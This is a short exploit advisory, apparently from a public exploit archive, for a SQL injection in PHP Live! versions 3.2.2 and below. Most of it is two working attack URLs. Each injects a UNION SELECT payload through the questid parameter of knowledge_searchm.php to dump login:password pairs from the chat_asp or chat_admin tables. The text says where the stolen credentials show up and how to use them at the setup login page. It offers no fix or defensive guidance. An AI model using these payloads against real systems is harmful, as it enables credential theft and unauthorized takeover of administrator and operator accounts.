PHP Live! versions 3.2.2 and below suffer from a remote SQL injection vulnerability.
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Original author: Found by Xar of h4ck-y0u, Greets to Don & ViSiOn
Modified version: skys
Contact: skysbsb[at]gmail.com
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[!]SQL Injection[!]
The original code was a little mistake, the right code:
Code:
Set the proper l(login) var in the parameter request.
In this example, l=admin
https://www.site.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_asp%20limit%200,1
In the Answer field, you will see the login:password for the
https://www.site.com/path-to-phplive/setup/login.php
or, if you want to mess only just with the operators,
https://www.site.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_admin%20limit%200,1